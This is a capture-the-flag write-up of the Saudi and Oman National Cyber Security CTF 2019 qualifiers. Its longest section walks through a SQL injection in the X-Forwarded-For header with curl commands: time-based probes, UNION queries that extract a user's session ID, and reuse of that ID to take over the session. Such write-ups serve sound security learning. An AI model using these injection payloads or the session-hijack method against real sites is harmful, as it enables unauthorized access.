- Name : Saudi and Oman National Cyber Security CTF 2019 Quals
- Website : cybertalents.com
- Type : Online
- Format : Jeopardy
- CTF Time : link
200 - Maria - Web#
Maria is the only person who can view the flag
If you access the page with a valid cookie, you won't see anything, eg.
curl -v http://126.96.36.199/maria/ -H 'Cookie: PHPSESSID=4l1vrp9q0tvgbjua7ddp9g2jh1;'.
But if you request the page without a cookie, you'll get an interesting result before the HTML content (I edited my IP address).
$ curl http://188.8.131.52/maria/
Let's try to spoof our IP address:
$ curl -v http://184.108.40.206/maria/ -H 'X-Forwarded-For: 127.0.0.1'
The fake IP address is reflected, so we are able to control the output through the
X-Forwarded-For HTTP header.
Let's find the number of columns with an Error-based SQLi:
$ curl -s http://220.127.116.11/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1-- -" | head -1
Now we know that the
nxf8_sessions has 4 columns.
Let's find if we can make a time based injection.
$ curl -s http://18.104.22.168/maria/ -H "X-Forwarded-For: 127.0.0.1' OR SLEEP(5)-- -" | head -1
SLEEP seems to be unavailable, it is maybe MySQL < 5.
$ curl -s http://22.214.171.124/maria/ -H "X-Forwarded-For: 127.0.0.1' OR BENCHMARK(100000000, rand())-- -" | head -1
BENCHMARK either, so it can't be MySQL so.
$ curl -s http://126.96.36.199/maria/ -H "X-Forwarded-For: 127.0.0.1' OR randomblob(100000000)-- -" | head -1
randomblob tells us it is a SQLite database, and the delay tells us it worked so we will be able to make a time based exploitation.
Let's guess another table than
nxf8_sessions using the same naming:
$ curl -s http://188.8.131.52/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT * FROM nxf8_persons-- -" | head -1
So there is a
nxf8_users table with a different number of column than
Let's guess some probable column names:
$ curl -s http://184.108.40.206/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT name,password,1,1 FROM nxf8_users where name='maria'-- -" | head -1
So far I found those tables and columns:
- more unidentified columns
Now we found the right table and columns, let's think about the payload we will need:
X-Forwarded-For: 127.0.0.1' UNION SELECT session_id,1,1,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- - to get the following query executed by the server:
SELECT * FROM nxf8_sessions where ip_address = '127.0.0.1' UNION SELECT session_id,1,1,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -';
Let's execute that:
$ curl --head http://220.127.116.11/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1,1,session_id,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -"
We can see there is two times
Set-Cookie: PHPSESSID, and the second is
As we sent a
SELECT 1 it must be the result of our query, we are selecting 4 columns but only one is reflected here, so let's change the order in the
Finally we found that the 4th column is injected in the
PHPSESSID value, so we will need to send
$ curl --head http://18.104.22.168/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1,1,1,session_id FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -"
But this way we are send two cookie with the same key
PHPSESSID so only the first one is being used by the server and we are not seeing anything.
Let's just make a normal request without injection and only the right cookie:
$ curl http://22.214.171.124/maria/ -H 'Cookie: PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968'
Now we have the
Hello Maria : your secret flag is : aj9dhAdf4.
50 - Back to basics - Web#
not pretty much many options. No need to open a link from a browser, there is always a different way
http://126.96.36.199/backtobasics redirects to (HTTP 302)
http://188.8.131.52/backtobasics/, then we can see there are 4 authorized HTTP verbs:
GET, POST, HEAD,OPTIONS.
There is also
$ curl -v http://184.108.40.206/backtobasics/
Let's try another method like
$ curl -X POST http://220.127.116.11/backtobasics/
Let's deobfuscate it and correct it manually.
var reversed_flag = "ceab068d9522dc567177de8009f323b2";
By executing the above code in our browser console we got
50 - I love images - Stego#
A hacker left us something that allows us to track him in this image, can you find it?
$ strings godot.png | tail -1 | base32 -d
50 - Just Another Conference - Quiz#
famous Cybersecurity conference runs by OWASP in different locations
- Stable platform
- Fair duration
- No team, only individual
- Few challenges: 9
- Unrealistic challenges
- Some challenges are unrelated to security: the stego challenges are not about true steganography but just fun/joy useless challenge requiring guessing
- Bad categorization: most forensics challenges were in fact some stego challenges
- Too much personal information is required for the registration like phone number, sex, the university you were, real name, etc. where only a pseudo and a email address are required.
Conclusion: Challenges are quite easy and targeting high school student who have some notions about security. But the challenges quality are rather low and if you already have the basics you won't learn anything useful in real life because challenge are all unrealistic. However for student you can still learn the basics or tricks that only exists in CTF.